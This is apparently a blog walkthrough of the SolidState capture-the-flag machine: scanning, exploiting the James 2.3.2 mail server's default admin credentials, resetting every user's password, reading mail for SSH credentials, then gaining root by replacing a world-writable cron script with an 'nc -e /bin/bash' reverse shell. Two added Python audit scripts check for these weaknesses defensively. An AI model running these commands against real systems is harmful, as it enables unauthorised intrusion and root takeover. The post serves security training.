1. Host discovery and information gathering
nmap -sn 192.168.25.0/24
Port scan
nmap --min-rate 10000 -p- $ip
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip
Service enumeration
nmap -sT -sV -O -p22,25,80,110,119,4555 $ip
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp        JAMES smtpd 2.3.2
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
MAC Address: 00:0C:29:CB:22:67 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Script scan
nmap --script=vuln -p22,25,80,110,119,4555 $ip
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.168.25.141:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/ie/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/ie/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/ie/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/ie/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.141:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.25.141:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.141
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.25.141:80/
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.25.141:80/index.html
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.25.141:80/about.html
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.25.141:80/services.html
|     Form id: name
|_    Form action: #
| http-enum:
|   /README.txt: Interesting, a readme.
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip
MAC Address: 00:0C:29:CB:22:67 (VMware)
From this output, the web server on port 80 may be vulnerable to SQL injection.
2. Beginning the penetration
Port 80 (the largest attack surface and the most important one, so look here first)
http://192.168.25.141:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
This is not SQL injection; it is a directory listing that exposes files, and it contains JS files.

So back to the standard approach.
First, scan the site directories.
gobuster dir -u http://192.168.25.141/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/images        (Status: 301) [Size: 317] [--> http://192.168.25.141/images/]
/assets        (Status: 301) [Size: 317] [--> http://192.168.25.141/assets/]
/server-status (Status: 403) [Size: 302]
Scan once more with a different tool.
services.html about.html
http://192.168.25.141/services.html
The web service consists only of static display pages with no functionality to inject into, so we turn to the other services.
Exploit usage
From the enumeration, the name that appears most often in the service versions is JAMES.
searchsploit JAMES

Several exploits exist, for version 2.3.2 no less; what a coincidence.
We focus on the RCE ones, the two in the middle, and download both.
searchsploit -m 35513
searchsploit -m 50347
Rename them to make the following steps easier.
mv 35513.py 1.py
mv 50347.py 2.py

Look at 2.py first.
It needs a python3 environment; here plain python is enough.
python 2.py 192.168.25.141 192.168.25.132 4444

This only fires once a user on the target logs in, so the first thought is whether the target has any scheduled tasks.
Waited a while and nothing happened...
Let's read the exploit, then.
It uses the James Remote Administration Tool default user root with password root. Since the exploit ran successfully, those credentials must be valid, so let's log in with them.

nc 192.168.25.141 4555
Log in directly with nc.

Login successful.
Now into the James Remote Admin commands.
help
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
Let's try each of them.
listusers (list the users)
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
adduser [user] [password] (add a user)
adduser mini mini
adduser mini mini
User mini added
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
user: mini
setpassword [user] [password] (change a password)
We reset all of them here and go through each mailbox over POP3 afterwards.
setpassword james root
Password for james reset
setpassword ../../../../../../../../etc/bash_completion.d root
Password for ../../../../../../../../etc/bash_completion.d reset
setpassword thomas root
Password for thomas reset
setpassword john root
Password for john reset
setpassword mindy root
Password for mindy reset
setpassword mailadmin root
Password for mailadmin reset
Every user's password is now root.
quit (exit)
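The console session above depended on two weaknesses: the Remote Admin console on port 4555 was reachable from the network, and its administrator account still used the shipped default root/root. The following configuration audit is an added example written for this page; it is neither code from the original post nor part of the James project. It assumes the James 2.3 config.xml layout (a remotemanager element with an enabled attribute, port, an optional bind element, and administrator_accounts holding account elements with login and password attributes); confirm those names against your own file before relying on it. The weak fragment and the hardened fragment are both constructed here.

```python
#!/usr/bin/env python3
"""Added example: audit a James 2.3-style config.xml for the two weaknesses
the admin-console session above depended on.

Assumed (not from the post): the element names <remotemanager enabled>,
<port>, <bind> and <administrator_accounts>/<account login password> follow
the James 2.3 config.xml layout; confirm them against your own file."""
import xml.etree.ElementTree as ET

# Default administrator credentials shipped with James 2.x.
DEFAULT_ADMINS = {("root", "root")}
# Bind addresses that keep the console off the network.
LOOPBACK = {"127.0.0.1", "localhost", "::1"}
MIN_PASSWORD_LEN = 12

# Constructed fragment reproducing the weak state seen on the box.
WEAK_CONFIG = """<config>
  <remotemanager enabled="true">
    <port>4555</port>
    <administrator_accounts>
      <account login="root" password="root"/>
    </administrator_accounts>
  </remotemanager>
</config>"""

# Constructed fragment with the corrections applied: loopback only, non-default login.
HARDENED_CONFIG = """<config>
  <remotemanager enabled="true">
    <port>4555</port>
    <bind>127.0.0.1</bind>
    <administrator_accounts>
      <account login="opsadmin" password="PLACEHOLDER-long-random-secret-here"/>
    </administrator_accounts>
  </remotemanager>
</config>"""


def audit_remotemanager(xml_text):
    """Return a list of findings (strings); an empty list means nothing was flagged."""
    findings = []
    root = ET.fromstring(xml_text)
    rm = root.find("remotemanager")
    # A missing or disabled console has no exposure to review.
    if rm is None or rm.get("enabled", "true").lower() != "true":
        return findings

    port = rm.findtext("port", default="?").strip()
    bind = rm.findtext("bind", default="").strip()
    if bind not in LOOPBACK:
        shown = bind or "all interfaces"
        findings.append(
            f"remote admin console on port {port} reachable beyond loopback (bind={shown})"
        )

    for acct in rm.iter("account"):
        login = acct.get("login", "")
        password = acct.get("password", "")
        if (login, password) in DEFAULT_ADMINS:
            findings.append(f"administrator '{login}' still uses the shipped default password")
        elif len(password) < MIN_PASSWORD_LEN:
            findings.append(
                f"administrator '{login}' has a short password ({len(password)} chars)"
            )
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"[{label}]", audit_remotemanager(cfg) or "no findings")
```

Run it against a real config by reading the file into a string and passing it to audit_remotemanager. Binding the console to loopback removes the remote attack surface entirely; changing the default password alone still leaves a password-guessing target listening on 4555.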
Connect to the POP3 service and look for sensitive information
telnet 192.168.25.141 110
Connect to POP3 with telnet and log in:
user james
pass root

Once logged in, use list to view the mail. There was none; quit and try the accounts one by one.

The ../../../../../../../../etc/bash_completion.d user has mail.
Read it with the retr command.
retr 1

This is what the exploit planted when it created that user.
thomas user: nothing
john user: 1 message, nothing of value

mindy user
Dear Mindy,

Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our organization. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
Found a username and password:
mindy P@55W0rd1!2@
mailadmin user: nothing
3. Obtaining initial access
With the password in hand, try the ssh service directly.
Logging in here gave an error; that must be the exploit above firing (it triggers as soon as someone logs in).
Go back to our listening terminal (nc -nvlp 4444); if you have not started it yet, start it now.


4. Privilege escalation
whoami
id
ip addr
echo $SHELL
echo $PATH
uname -a
ls
cat user.txt
914d0a4ebc1777889b5b89a23f556fd75
This looks like a hash or encrypted value.

Use a tool to identify which hash type it is: nothing.
hash-identifier 914d0a4ebc1777889b5b89a23f556fd75
Then search for traces of passwords with a command.
grep -R -i pass /home/* 2>/dev/null
Nothing.
Check the setuid programs next.
find / -perm -u=s -ls 2>/dev/null
Looking at the setuid programs, there are quite a few commands that could be used for escalation.

Search GTFOBins for the escalation command,
e.g. mount:
sudo mount -o bind /bin/sh /bin/mount
sudo mount
But we do not have sudo, which is annoying.
Hunting for valuable user files
ls -la /home/
find /home/james/ -type f -ls 2>/dev/null
cron scheduled tasks
find /var/spool/cron/ -type f -ls 2>/dev/null
find /etc/cron -type f -ls 2>/dev/null

No writable scheduled tasks.
find / -perm -0006 -type f ! -path "/proc/*" 2>/dev/null
Search the whole filesystem from / for regular files whose permission bits include at least 0006 (read and write for others), excluding everything under /proc/:
- find: searches the filesystem for files and directories.
- /: start the search at the root directory.
- -perm -0006: -perm matches on permission bits. -0006 is octal; the 6 in the "other" position means rw-. The leading - means "at least these bits set", so a file may carry more permissions than 0006 but must include read and write for others.
- -type f: only regular files, not directories, symbolic links or other types.
- ! -path "/proc/*": ! negates the test, and -path matches on the file path, so this excludes everything under /proc/, the pseudo-filesystem that holds process information and is not what we are looking for.
Found the file /opt/tmp.py.


It is a scheduled script that cleans up temporary files; let's check its permissions.
OK, found it.
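The find command explained above and the /opt/tmp.py discovery that follows are two halves of one audit: world-writable regular files, and the subset of them that a scheduled task executes. The script below is an added example written for this page, not code from the original post or from the box. It mirrors the -perm -0006 test with stat mode bits, then cross-references the hits against the absolute paths named in cron entries, and it builds a constructed fixture (a 0777 cleanup script next to a 0755 one, both referenced from a cron.d file) so it runs stand-alone. The cron locations in CRON_LOCATIONS and the fixture contents are assumptions.

```python
#!/usr/bin/env python3
"""Added example: audit for the escalation condition found on this box, a
scheduled task that executes a script unprivileged users can modify.

Stage 1 mirrors  find / -perm -0006 -type f ! -path "/proc/*"  with stat
mode bits; stage 2 cross-references the hits against absolute paths named in
cron entries. The fixture tree is constructed here for a self-contained run;
on a live host call audit("/", CRON_LOCATIONS) as root."""
import os
import re
import stat
import tempfile

# Same bits as find -perm -0006: read and write for "other".
WORLD_RW = stat.S_IROTH | stat.S_IWOTH
# Where a defender would normally look for scheduled tasks (assumed layout).
CRON_LOCATIONS = ("/etc/crontab", "/etc/cron.d", "/var/spool/cron")
# Coarse match for absolute paths in a cron line; stray hits such as the
# "/3" in "*/3" are harmless because they never match a real file.
PATH_RE = re.compile(r"(/[\w./-]+)")


def world_writable_files(root, skip=("/proc",)):
    """Regular files under root whose mode includes 0o006, skipping pseudo-filesystems."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if any(dirpath == s or dirpath.startswith(s + "/") for s in skip):
            dirnames[:] = []  # do not descend further
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # judge the file itself, not a symlink target
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and (st.st_mode & WORLD_RW) == WORLD_RW:
                hits.append(path)
    return sorted(hits)


def cron_files_under(locations):
    """Expand crontab files and cron directories into a flat list of files."""
    files = []
    for loc in locations:
        if os.path.isfile(loc):
            files.append(loc)
        elif os.path.isdir(loc):
            for dp, _, names in os.walk(loc):
                files.extend(os.path.join(dp, n) for n in names)
    return files


def cron_referenced_paths(cron_files):
    """Absolute paths mentioned on non-comment lines of the given cron files."""
    paths = set()
    for cf in cron_files:
        try:
            with open(cf, errors="replace") as fh:
                for line in fh:
                    line = line.strip()
                    if line and not line.startswith("#"):
                        paths.update(PATH_RE.findall(line))
        except OSError:
            continue
    return paths


def audit(root, cron_locations):
    """Return (all world-writable regular files, the subset executed from cron)."""
    writable = world_writable_files(root)
    referenced = cron_referenced_paths(cron_files_under(cron_locations))
    return writable, [p for p in writable if p in referenced]


def build_sample_tree():
    """Constructed fixture: a cron entry running a 0777 cleanup script (the weak
    setting) next to a 0755 script (the corrected setting)."""
    base = tempfile.mkdtemp(prefix="cron-audit-")
    opt = os.path.join(base, "opt")
    cron_d = os.path.join(base, "etc", "cron.d")
    os.makedirs(opt)
    os.makedirs(cron_d)
    bad = os.path.join(opt, "tmp.py")
    good = os.path.join(opt, "backup.sh")
    with open(bad, "w") as fh:
        fh.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n")
    with open(good, "w") as fh:
        fh.write("#!/bin/sh\ntar czf /var/backups/etc.tgz /etc\n")
    os.chmod(bad, 0o777)   # anyone may rewrite what root will execute
    os.chmod(good, 0o755)  # owner-writable only
    with open(os.path.join(cron_d, "cleanup"), "w") as fh:
        fh.write("# constructed sample entries\n")
        fh.write(f"*/3 * * * * root python {bad}\n")
        fh.write(f"0 2 * * * root {good}\n")
    return base, bad, good, cron_d


def run_sample():
    """Build the fixture and audit it; returns (bad, good, writable, dangerous)."""
    base, bad, good, cron_d = build_sample_tree()
    writable, dangerous = audit(base, [cron_d])
    return bad, good, writable, dangerous


if __name__ == "__main__":
    bad, good, writable, dangerous = run_sample()
    for p in dangerous:
        print("world-writable and executed from cron:", p)
```

Only tmp.py is reported: backup.sh is referenced from cron but not world-writable, and the cron.d file itself is writable by its owner alone. Remediation is the same for every hit: chmod o-w on the script, and verify that its parent directory is not world-writable either, since a writable directory lets the file be replaced wholesale.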

os.system('nc -nv 192.168.25.132 4445 -e /bin/bash &')
Replace the task's command with a reverse shell command.
This is the interactive reverse shell form; here we use the sed stream editor.
sed -i 's/\(rm -r \/tmp\/*\)/\(nc -nv 192.168.25.132 4445 -e \/bin\/bash &\)/g' tmp.py
-i edits the file in place and saves it
s is the substitute operation
g means global: replace every occurrence of the text os.system('rm -r /tmp/* ')
The parentheses () are prefixed with \ to escape them, otherwise sed reports an error

In the current directory sed has no permission to do this.
So vi it is; let's switch connection type and log in over ssh.
We had not started the listener, so the exploit errored out and we landed directly in ssh.


Right, under ssh we cannot run any commands at all.
Back to the earlier listener, then, and set up a pty.
python -c 'import pty; pty.spawn("/bin/bash")'


This edit mode may be a bit odd, so let's first save the file's text, then empty the file,
and paste the modified text back in:
#!/usr/bin/env python
import os
import sys
try:
    os.system('nc -nv 192.168.25.132 4445 -e /bin/bash &')
except:
    sys.exit()
First empty it: echo > tmp.py
cat it to confirm it is empty.

Then vi tmp.py
Press i to enter insert mode and paste the modified content.

Emm, it looks roughly like this, a bit odd, but the content is correct.

Start a listener and wait for the connection (on the port the replaced command connects back to):
nc -nvlp 4445

Connection received, and it is root.
Unless otherwise stated, all articles on this blog are the author's original work.
If you repost, please credit the source: https://www.oneblanks.xyz/solidstate%e9%9d%b6%e6%9c%ba%e8%ae%ad%e7%bb%83/